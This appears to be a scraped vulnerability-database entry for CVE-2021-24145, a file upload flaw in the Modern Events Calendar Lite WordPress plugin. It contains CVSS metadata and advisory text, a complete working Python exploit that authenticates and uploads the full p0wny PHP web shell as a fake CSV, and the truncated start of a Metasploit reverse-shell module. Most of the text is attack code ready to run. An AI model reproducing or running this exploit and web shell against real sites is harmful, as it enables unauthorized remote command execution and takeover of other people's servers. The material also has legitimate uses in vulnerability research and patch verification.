Exploit for Unrestricted Upload of File with Dangerous Type in Webnus Modern Events Calendar Lite

2021-08-14T02:56:50

Description

# CVE-2021-24145 WordPress File Upload Vulnerability, Modern Eve...

{"id": "A7E0CB1F-898C-551C-B6E7-E50EF94F99AB", "vendorId": null, "type": "githubexploit", "bulletinFamily": "exploit", "title": "Exploit for Unrestricted Upload of File with Dangerous Type in Webnus Modern Events Calendar Lite", "description": "# CVE-2021-24145\nWordPress File Upload Vulnerability, Modern Eve...", "published": "2021-08-14T02:56:50", "modified": "2022-05-08T06:54:55", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "baseScore": 6.5}, "severity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 7.2, "baseSeverity": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}, "href": "", "reporter": "", "references": [], "cvelist": ["CVE-2021-24145"], "immutableFields": [], "lastseen": "2022-05-08T09:33:39", "viewCount": 25, "enchantments": {"dependencies": {"references": [{"type": "checkpoint_advisories", "idList": ["CPAI-2021-0496"]}, {"type": "cve", "idList": ["CVE-2021-24145"]}, {"type": "exploitdb", "idList": ["EDB-ID:50082"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:163346", "PACKETSTORM:163672"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:BC95AC0129EFB4BE8FD9B532251948ED"]}, {"type": "wpexploit", "idList": ["WPEX-ID:F42CC26B-9AAB-4824-8168-B5B8571D1610"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:F42CC26B-9AAB-4824-8168-B5B8571D1610"]}, {"type": "zdt", "idList": ["1337DAY-ID-36503", "1337DAY-ID-36594"]}], "rev": 4}, "score": {"value": 5.2, "vector": "NONE"}, "backreferences": {"references": [{"type": "checkpoint_advisories", "idList": ["CPAI-2021-0496"]}, {"type": "cve", "idList": ["CVE-2021-24145"]}, {"type": "exploitdb", "idList": ["EDB-ID:50082"]}, {"type": "kitploit", "idList": ["KITPLOIT:3449843613571411531"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:163346", "PACKETSTORM:163672"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:BC95AC0129EFB4BE8FD9B532251948ED"]}, {"type": "threatpost", "idList": ["THREATPOST:99DC4B497599503D640FDFD9A2DC5FA3"]}, {"type": "wpexploit", "idList": ["WPEX-ID:F42CC26B-9AAB-4824-8168-B5B8571D1610"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:F42CC26B-9AAB-4824-8168-B5B8571D1610"]}, {"type": "zdt", "idList": ["1337DAY-ID-36503"]}]}, "exploitation": null, "vulnersScore": 5.2}, "_state": {"dependencies": 0}, "_internal": {}, "privateArea": 1}

{"cve": [{"lastseen": "2022-03-23T14:47:46", "description": "Arbitrary file upload in the Modern Events Calendar Lite WordPress plugin, versions before 5.16.5, did not properly check the imported file, allowing PHP ones to be uploaded by administrator by using the 'text/csv' content-type in the request.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-18T15:15:00", "type": "cve", "title": "CVE-2021-24145", "cwe": ["CWE-434"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24145"], "modified": "2021-12-03T18:07:00", "cpe": [], "id": "CVE-2021-24145", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-24145", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": []}], "checkpoint_advisories": [{"lastseen": "2022-02-16T19:38:04", "description": "A remote code execution vulnerability exists in WordPress Modern Events Calendar Plugin. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-18T00:00:00", "type": "checkpoint_advisories", "title": "WordPress Modern Events Calendar Plugin Remote Code Execution (CVE-2021-24145)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24145"], "modified": "2021-08-18T00:00:00", "id": "CPAI-2021-0496", "href": "", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "zdt": [{"lastseen": "2021-12-04T15:53:04", "description": "", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-02T00:00:00", "type": "zdt", "title": "Wordpress Modern Events Calendar 5.16.2 Plugin - Remote Code Execution (Authenticated) Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24145"], "modified": "2021-07-02T00:00:00", "id": "1337DAY-ID-36503", "href": "https://0day.today/exploit/description/36503", "sourceData": "# Exploit Title: Wordpress Plugin Modern Events Calendar 5.16.2 - Remote Code Execution (Authenticated)\n# Exploit Author: Ron Jost (Hacker5preme)\n# Vendor Homepage: https://webnus.net/modern-events-calendar/\n# Software Link: https://downloads.wordpress.org/plugin/modern-events-calendar-lite.5.16.2.zip\n# Version: Before 5.16.5\n# Tested on: Ubuntu 18.04\n# CVE: CVE-2021-24145\n# CWE: CWE-434\n# Documentation: https://github.com/Hacker5preme/Exploits/blob/main/Wordpress/CVE-2021-24145/README.md\n\n'''\nDescription:\nArbitrary file upload in the Modern Events Calendar Lite WordPress plugin, versions before 5.16.5,\ndid not properly check the imported file, allowing PHP ones to be uploaded by administrator by using the 'text/csv'\ncontent-type in the request.\n'''\n\n\n'''\nBanner:\n'''\nbanner = \"\"\"\n ______ _______ ____ ___ ____ _ ____ _ _ _ _ _ ____ \n / ___\\ \\ / / ____| |___ \\ / _ \\___ \\/ | |___ \\| || | / | || || ___| \n| | \\ \\ / /| _| _____ __) | | | |__) | |_____ __) | || |_| | || ||___ \\ \n| |___ \\ V / | |__|_____/ __/| |_| / __/| |_____/ __/|__ _| |__ _|__) |\n \\____| \\_/ |_____| |_____|\\___/_____|_| |_____| |_| |_| |_||____/ \n \n * Wordpress Plugin Modern Events Calendar Lite RCE \n * @Hacker5preme\n \n\n\"\"\"\nprint(banner)\n\n'''\nImport required modules:\n'''\nimport requests\nimport argparse\n\n'''\nUser-Input:\n'''\nmy_parser = argparse.ArgumentParser(description='Wordpress Plugin Modern Events Calenar Lite RCE (Authenticated)')\nmy_parser.add_argument('-T', '--IP', type=str)\nmy_parser.add_argument('-P', '--PORT', type=str)\nmy_parser.add_argument('-U', '--PATH', type=str)\nmy_parser.add_argument('-u', '--USERNAME', type=str)\nmy_parser.add_argument('-p', '--PASSWORD', type=str)\nargs = my_parser.parse_args()\ntarget_ip = args.IP\ntarget_port = args.PORT\nwp_path = args.PATH\nusername = args.USERNAME\npassword = args.PASSWORD\nprint('')\n\n'''\nAuthentication:\n'''\nsession = requests.Session()\nauth_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-login.php'\n\n# Header:\nheader = {\n 'Host': target_ip,\n 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0',\n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',\n 'Accept-Language': 'de,en-US;q=0.7,en;q=0.3',\n 'Accept-Encoding': 'gzip, deflate',\n 'Content-Type': 'application/x-www-form-urlencoded',\n 'Origin': 'http://' + target_ip,\n 'Connection': 'close',\n 'Upgrade-Insecure-Requests': '1'\n}\n\n# Body:\nbody = {\n 'log': username,\n 'pwd': password,\n 'wp-submit': 'Log In',\n 'testcookie': '1'\n}\n\n# Authenticate:\nprint('')\nauth = session.post(auth_url, headers=header, data=body)\nauth_header = auth.headers['Set-Cookie']\nif 'wordpress_logged_in' in auth_header:\n print('[+] Authentication successfull !')\nelse:\n print('[-] Authentication failed !')\n exit()\n\n\n'''\nExploit:\n'''\nexploit_url = \"http://\" + target_ip + ':' + target_port + wp_path + \"wp-admin/admin.php?page=MEC-ix&tab=MEC-import\"\n\n# Exploit Header:\nheader = {\n \"User-Agent\": \"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0\",\n \"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\",\n \"Accept-Language\": \"de,en-US;q=0.7,en;q=0.3\",\n \"Accept-Encoding\": \"gzip, deflate\",\n \"Content-Type\": \"multipart/form-data; boundary=---------------------------29650037893637916779865254589\",\n \"Origin\": \"http://\" + target_ip,\n \"Connection\": \"close\",\n \"Upgrade-Insecure-Requests\": \"1\"\n}\n\n# Exploit Body: (using p0wny shell: https://github.com/flozz/p0wny-shell\nbody = \"-----------------------------29650037893637916779865254589\\r\\nContent-Disposition: form-data; name=\\\"feed\\\"; filename=\\\"shell.php\\\"\\r\\nContent-Type: text/csv\\r\\n\\r\\n<?php\\n\\nfunction featureShell($cmd, $cwd) {\\n $stdout = array();\\n\\n if (preg_match(\\\"/^\\\\s*cd\\\\s*$/\\\", $cmd)) {\\n // pass\\n } elseif (preg_match(\\\"/^\\\\s*cd\\\\s+(.+)\\\\s*(2>&1)?$/\\\", $cmd)) {\\n chdir($cwd);\\n preg_match(\\\"/^\\\\s*cd\\\\s+([^\\\\s]+)\\\\s*(2>&1)?$/\\\", $cmd, $match);\\n chdir($match[1]);\\n } elseif (preg_match(\\\"/^\\\\s*download\\\\s+[^\\\\s]+\\\\s*(2>&1)?$/\\\", $cmd)) {\\n chdir($cwd);\\n preg_match(\\\"/^\\\\s*download\\\\s+([^\\\\s]+)\\\\s*(2>&1)?$/\\\", $cmd, $match);\\n return featureDownload($match[1]);\\n } else {\\n chdir($cwd);\\n exec($cmd, $stdout);\\n }\\n\\n return array(\\n \\\"stdout\\\" => $stdout,\\n \\\"cwd\\\" => getcwd()\\n );\\n}\\n\\nfunction featurePwd() {\\n return array(\\\"cwd\\\" => getcwd());\\n}\\n\\nfunction featureHint($fileName, $cwd, $type) {\\n chdir($cwd);\\n if ($type == 'cmd') {\\n $cmd = \\\"compgen -c $fileName\\\";\\n } else {\\n $cmd = \\\"compgen -f $fileName\\\";\\n }\\n $cmd = \\\"/bin/bash -c \\\\\\\"$cmd\\\\\\\"\\\";\\n $files = explode(\\\"\\\\n\\\", shell_exec($cmd));\\n return array(\\n 'files' => $files,\\n );\\n}\\n\\nfunction featureDownload($filePath) {\\n $file = @file_get_contents($filePath);\\n if ($file === FALSE) {\\n return array(\\n 'stdout' => array('File not found / no read permission.'),\\n 'cwd' => getcwd()\\n );\\n } else {\\n return array(\\n 'name' => basename($filePath),\\n 'file' => base64_encode($file)\\n );\\n }\\n}\\n\\nfunction featureUpload($path, $file, $cwd) {\\n chdir($cwd);\\n $f = @fopen($path, 'wb');\\n if ($f === FALSE) {\\n return array(\\n 'stdout' => array('Invalid path / no write permission.'),\\n 'cwd' => getcwd()\\n );\\n } else {\\n fwrite($f, base64_decode($file));\\n fclose($f);\\n return array(\\n 'stdout' => array('Done.'),\\n 'cwd' => getcwd()\\n );\\n }\\n}\\n\\nif (isset($_GET[\\\"feature\\\"])) {\\n\\n $response = NULL;\\n\\n switch ($_GET[\\\"feature\\\"]) {\\n case \\\"shell\\\":\\n $cmd = $_POST['cmd'];\\n if (!preg_match('/2>/', $cmd)) {\\n $cmd .= ' 2>&1';\\n }\\n $response = featureShell($cmd, $_POST[\\\"cwd\\\"]);\\n break;\\n case \\\"pwd\\\":\\n $response = featurePwd();\\n break;\\n case \\\"hint\\\":\\n $response = featureHint($_POST['filename'], $_POST['cwd'], $_POST['type']);\\n break;\\n case 'upload':\\n $response = featureUpload($_POST['path'], $_POST['file'], $_POST['cwd']);\\n }\\n\\n header(\\\"Content-Type: application/json\\\");\\n echo json_encode($response);\\n die();\\n}\\n\\n?><!DOCTYPE html>\\n\\n<html>\\n\\n <head>\\n <meta charset=\\\"UTF-8\\\" />\\n <title>[email\u00a0protected]:~#</title>\\n <meta name=\\\"viewport\\\" content=\\\"width=device-width, initial-scale=1.0\\\" />\\n <style>\\n html, body {\\n margin: 0;\\n padding: 0;\\n background: #333;\\n color: #eee;\\n font-family: monospace;\\n }\\n\\n *::-webkit-scrollbar-track {\\n border-radius: 8px;\\n background-color: #353535;\\n }\\n\\n *::-webkit-scrollbar {\\n width: 8px;\\n height: 8px;\\n }\\n\\n *::-webkit-scrollbar-thumb {\\n border-radius: 8px;\\n -webkit-box-shadow: inset 0 0 6px rgba(0,0,0,.3);\\n background-color: #bcbcbc;\\n }\\n\\n #shell {\\n background: #222;\\n max-width: 800px;\\n margin: 50px auto 0 auto;\\n box-shadow: 0 0 5px rgba(0, 0, 0, .3);\\n font-size: 10pt;\\n display: flex;\\n flex-direction: column;\\n align-items: stretch;\\n }\\n\\n #shell-content {\\n height: 500px;\\n overflow: auto;\\n padding: 5px;\\n white-space: pre-wrap;\\n flex-grow: 1;\\n }\\n\\n #shell-logo {\\n font-weight: bold;\\n color: #FF4180;\\n text-align: center;\\n }\\n\\n @media (max-width: 991px) {\\n #shell-logo {\\n font-size: 6px;\\n margin: -25px 0;\\n }\\n\\n html, body, #shell {\\n height: 100%;\\n width: 100%;\\n max-width: none;\\n }\\n\\n #shell {\\n margin-top: 0;\\n }\\n }\\n\\n @media (max-width: 767px) {\\n #shell-input {\\n flex-direction: column;\\n }\\n }\\n\\n @media (max-width: 320px) {\\n #shell-logo {\\n font-size: 5px;\\n }\\n }\\n\\n .shell-prompt {\\n font-weight: bold;\\n color: #75DF0B;\\n }\\n\\n .shell-prompt > span {\\n color: #1BC9E7;\\n }\\n\\n #shell-input {\\n display: flex;\\n box-shadow: 0 -1px 0 rgba(0, 0, 0, .3);\\n border-top: rgba(255, 255, 255, .05) solid 1px;\\n }\\n\\n #shell-input > label {\\n flex-grow: 0;\\n display: block;\\n padding: 0 5px;\\n height: 30px;\\n line-height: 30px;\\n }\\n\\n #shell-input #shell-cmd {\\n height: 30px;\\n line-height: 30px;\\n border: none;\\n background: transparent;\\n color: #eee;\\n font-family: monospace;\\n font-size: 10pt;\\n width: 100%;\\n align-self: center;\\n }\\n\\n #shell-input div {\\n flex-grow: 1;\\n align-items: stretch;\\n }\\n\\n #shell-input input {\\n outline: none;\\n }\\n </style>\\n\\n <script>\\n var CWD = null;\\n var commandHistory = [];\\n var historyPosition = 0;\\n var eShellCmdInput = null;\\n var eShellContent = null;\\n\\n function _insertCommand(command) {\\n eShellContent.innerHTML += \\\"\\\\n\\\\n\\\";\\n eShellContent.innerHTML += '<span class=\\\\\\\"shell-prompt\\\\\\\">' + genPrompt(CWD) + '</span> ';\\n eShellContent.innerHTML += escapeHtml(command);\\n eShellContent.innerHTML += \\\"\\\\n\\\";\\n eShellContent.scrollTop = eShellContent.scrollHeight;\\n }\\n\\n function _insertStdout(stdout) {\\n eShellContent.innerHTML += escapeHtml(stdout);\\n eShellContent.scrollTop = eShellContent.scrollHeight;\\n }\\n\\n function _defer(callback) {\\n setTimeout(callback, 0);\\n }\\n\\n function featureShell(command) {\\n\\n _insertCommand(command);\\n if (/^\\\\s*upload\\\\s+[^\\\\s]+\\\\s*$/.test(command)) {\\n featureUpload(command.match(/^\\\\s*upload\\\\s+([^\\\\s]+)\\\\s*$/)[1]);\\n } else if (/^\\\\s*clear\\\\s*$/.test(command)) {\\n // Backend shell TERM environment variable not set. Clear command history from UI but keep in buffer\\n eShellContent.innerHTML = '';\\n } else {\\n makeRequest(\\\"?feature=shell\\\", {cmd: command, cwd: CWD}, function (response) {\\n if (response.hasOwnProperty('file')) {\\n featureDownload(response.name, response.file)\\n } else {\\n _insertStdout(response.stdout.join(\\\"\\\\n\\\"));\\n updateCwd(response.cwd);\\n }\\n });\\n }\\n }\\n\\n function featureHint() {\\n if (eShellCmdInput.value.trim().length === 0) return; // field is empty -> nothing to complete\\n\\n function _requestCallback(data) {\\n if (data.files.length <= 1) return; // no completion\\n\\n if (data.files.length === 2) {\\n if (type === 'cmd') {\\n eShellCmdInput.value = data.files[0];\\n } else {\\n var currentValue = eShellCmdInput.value;\\n eShellCmdInput.value = currentValue.replace(/([^\\\\s]*)$/, data.files[0]);\\n }\\n } else {\\n _insertCommand(eShellCmdInput.value);\\n _insertStdout(data.files.join(\\\"\\\\n\\\"));\\n }\\n }\\n\\n var currentCmd = eShellCmdInput.value.split(\\\" \\\");\\n var type = (currentCmd.length === 1) ? \\\"cmd\\\" : \\\"file\\\";\\n var fileName = (type === \\\"cmd\\\") ? currentCmd[0] : currentCmd[currentCmd.length - 1];\\n\\n makeRequest(\\n \\\"?feature=hint\\\",\\n {\\n filename: fileName,\\n cwd: CWD,\\n type: type\\n },\\n _requestCallback\\n );\\n\\n }\\n\\n function featureDownload(name, file) {\\n var element = document.createElement('a');\\n element.setAttribute('href', 'data:application/octet-stream;base64,' + file);\\n element.setAttribute('download', name);\\n element.style.display = 'none';\\n document.body.appendChild(element);\\n element.click();\\n document.body.removeChild(element);\\n _insertStdout('Done.');\\n }\\n\\n function featureUpload(path) {\\n var element = document.createElement('input');\\n element.setAttribute('type', 'file');\\n element.style.display = 'none';\\n document.body.appendChild(element);\\n element.addEventListener('change', function () {\\n var promise = getBase64(element.files[0]);\\n promise.then(function (file) {\\n makeRequest('?feature=upload', {path: path, file: file, cwd: CWD}, function (response) {\\n _insertStdout(response.stdout.join(\\\"\\\\n\\\"));\\n updateCwd(response.cwd);\\n });\\n }, function () {\\n _insertStdout('An unknown client-side error occurred.');\\n });\\n });\\n element.click();\\n document.body.removeChild(element);\\n }\\n\\n function getBase64(file, onLoadCallback) {\\n return new Promise(function(resolve, reject) {\\n var reader = new FileReader();\\n reader.onload = function() { resolve(reader.result.match(/base64,(.*)$/)[1]); };\\n reader.onerror = reject;\\n reader.readAsDataURL(file);\\n });\\n }\\n\\n function genPrompt(cwd) {\\n cwd = cwd || \\\"~\\\";\\n var shortCwd = cwd;\\n if (cwd.split(\\\"/\\\").length > 3) {\\n var splittedCwd = cwd.split(\\\"/\\\");\\n shortCwd = \\\"\\xe2\\x80\\xa6/\\\" + splittedCwd[splittedCwd.length-2] + \\\"/\\\" + splittedCwd[splittedCwd.length-1];\\n }\\n return \\\"[email\u00a0protected]:<span title=\\\\\\\"\\\" + cwd + \\\"\\\\\\\">\\\" + shortCwd + \\\"</span>#\\\";\\n }\\n\\n function updateCwd(cwd) {\\n if (cwd) {\\n CWD = cwd;\\n _updatePrompt();\\n return;\\n }\\n makeRequest(\\\"?feature=pwd\\\", {}, function(response) {\\n CWD = response.cwd;\\n _updatePrompt();\\n });\\n\\n }\\n\\n function escapeHtml(string) {\\n return string\\n .replace(/&/g, \\\"&\\\")\\n .replace(/</g, \\\"<\\\")\\n .replace(/>/g, \\\">\\\");\\n }\\n\\n function _updatePrompt() {\\n var eShellPrompt = document.getElementById(\\\"shell-prompt\\\");\\n eShellPrompt.innerHTML = genPrompt(CWD);\\n }\\n\\n function _onShellCmdKeyDown(event) {\\n switch (event.key) {\\n case \\\"Enter\\\":\\n featureShell(eShellCmdInput.value);\\n insertToHistory(eShellCmdInput.value);\\n eShellCmdInput.value = \\\"\\\";\\n break;\\n case \\\"ArrowUp\\\":\\n if (historyPosition > 0) {\\n historyPosition--;\\n eShellCmdInput.blur();\\n eShellCmdInput.value = commandHistory[historyPosition];\\n _defer(function() {\\n eShellCmdInput.focus();\\n });\\n }\\n break;\\n case \\\"ArrowDown\\\":\\n if (historyPosition >= commandHistory.length) {\\n break;\\n }\\n historyPosition++;\\n if (historyPosition === commandHistory.length) {\\n eShellCmdInput.value = \\\"\\\";\\n } else {\\n eShellCmdInput.blur();\\n eShellCmdInput.focus();\\n eShellCmdInput.value = commandHistory[historyPosition];\\n }\\n break;\\n case 'Tab':\\n event.preventDefault();\\n featureHint();\\n break;\\n }\\n }\\n\\n function insertToHistory(cmd) {\\n commandHistory.push(cmd);\\n historyPosition = commandHistory.length;\\n }\\n\\n function makeRequest(url, params, callback) {\\n function getQueryString() {\\n var a = [];\\n for (var key in params) {\\n if (params.hasOwnProperty(key)) {\\n a.push(encodeURIComponent(key) + \\\"=\\\" + encodeURIComponent(params[key]));\\n }\\n }\\n return a.join(\\\"&\\\");\\n }\\n var xhr = new XMLHttpRequest();\\n xhr.open(\\\"POST\\\", url, true);\\n xhr.setRequestHeader(\\\"Content-Type\\\", \\\"application/x-www-form-urlencoded\\\");\\n xhr.onreadystatechange = function() {\\n if (xhr.readyState === 4 && xhr.status === 200) {\\n try {\\n var responseJson = JSON.parse(xhr.responseText);\\n callback(responseJson);\\n } catch (error) {\\n alert(\\\"Error while parsing response: \\\" + error);\\n }\\n }\\n };\\n xhr.send(getQueryString());\\n }\\n\\n document.onclick = function(event) {\\n event = event || window.event;\\n var selection = window.getSelection();\\n var target = event.target || event.srcElement;\\n\\n if (target.tagName === \\\"SELECT\\\") {\\n return;\\n }\\n\\n if (!selection.toString()) {\\n eShellCmdInput.focus();\\n }\\n };\\n\\n window.onload = function() {\\n eShellCmdInput = document.getElementById(\\\"shell-cmd\\\");\\n eShellContent = document.getElementById(\\\"shell-content\\\");\\n updateCwd();\\n eShellCmdInput.focus();\\n };\\n </script>\\n </head>\\n\\n <body>\\n <div id=\\\"shell\\\">\\n <pre id=\\\"shell-content\\\">\\n <div id=\\\"shell-logo\\\">\\n ___ ____ _ _ _ _ _ <span></span>\\n _ __ / _ \\\\__ ___ __ _ _ / __ \\\\ ___| |__ ___| | |_ /\\\\/|| || |_ <span></span>\\n| '_ \\\\| | | \\\\ \\\\ /\\\\ / / '_ \\\\| | | |/ / _` / __| '_ \\\\ / _ \\\\ | (_)/\\\\/_ .. _|<span></span>\\n| |_) | |_| |\\\\ V V /| | | | |_| | | (_| \\\\__ \\\\ | | | __/ | |_ |_ _|<span></span>\\n| .__/ \\\\___/ \\\\_/\\\\_/ |_| |_|\\\\__, |\\\\ \\\\__,_|___/_| |_|\\\\___|_|_(_) |_||_| <span></span>\\n|_| |___/ \\\\____/ <span></span>\\n </div>\\n </pre>\\n <div id=\\\"shell-input\\\">\\n <label for=\\\"shell-cmd\\\" id=\\\"shell-prompt\\\" class=\\\"shell-prompt\\\">???</label>\\n <div>\\n <input id=\\\"shell-cmd\\\" name=\\\"cmd\\\" onkeydown=\\\"_onShellCmdKeyDown(event)\\\"/>\\n </div>\\n </div>\\n </div>\\n </body>\\n\\n</html>\\n\\r\\n-----------------------------29650037893637916779865254589\\r\\nContent-Disposition: form-data; name=\\\"mec-ix-action\\\"\\r\\n\\r\\nimport-start-bookings\\r\\n-----------------------------29650037893637916779865254589--\\r\\n\"\n\n# Exploit\nsession.post(exploit_url, headers=header, data=body)\nprint('')\nprint('[+] Shell Uploaded to: ' + 'http://' + target_ip + ':' + target_port + wp_path + '/wp-content/uploads/shell.php')\nprint('')\n", "sourceHref": "https://0day.today/exploit/36503", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2021-12-22T15:28:36", "description": "This Metasploit module allows an attacker with a privileged WordPress account to launch a reverse shell due to an arbitrary file upload vulnerability in WordPress Modern Events Calendar plugin versions prior to 5.16.5. This is due to an incorrect check of the uploaded file extension. Indeed, by using text/csv content-type in a request, it is possible to upload a .php payload as is is not forbidden by the plugin. Finally, the uploaded payload can be triggered by a call to /wp-content/uploads/<random_payload_name>.php.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-26T00:00:00", "type": "zdt", "title": "WordPress Modern Events Calendar Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24145"], "modified": "2021-07-26T00:00:00", "id": "1337DAY-ID-36594", "href": "https://0day.today/exploit/description/36594", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::CmdStager\n include Msf::Exploit::Remote::HTTP::Wordpress\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Wordpress Plugin Modern Events Calendar - Authenticated Remote Code Execution',\n 'Description' => %q{\n This module allows an attacker with a privileged Wordpress account to launch a reverse shell\n due to an arbitrary file upload vulnerability in Wordpress plugin Modern Events Calendar < 5.16.5.\n This is due to an incorrect check of the uploaded file extension.\n Indeed, by using `text/csv` content-type in a request, it is possible to upload a .php payload as is is not forbidden by the plugin.\n Finally, the uploaded payload can be triggered by a call to `/wp-content/uploads/<random_payload_name>.php`\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Nguyen Van Khanh', # Original PoC and discovery\n 'Ron Jost', # Exploit-db\n 'Yann Castel (yann.castel[at]orange.com)' # Metasploit module\n ],\n 'References' =>\n [\n ['EDB', '50115'],\n ['CVE', '2021-24145'],\n ['CWE', '434']\n ],\n 'Platform' => [ 'php' ],\n 'Arch' => ARCH_PHP,\n 'Targets' =>\n [\n [ 'Wordpress Modern Events Calendar < 5.16.5', {}]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => '2021-01-29',\n 'Notes' =>\n {\n 'Stability' => [ CRASH_SAFE ],\n 'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],\n 'Reliability' => [ REPEATABLE_SESSION 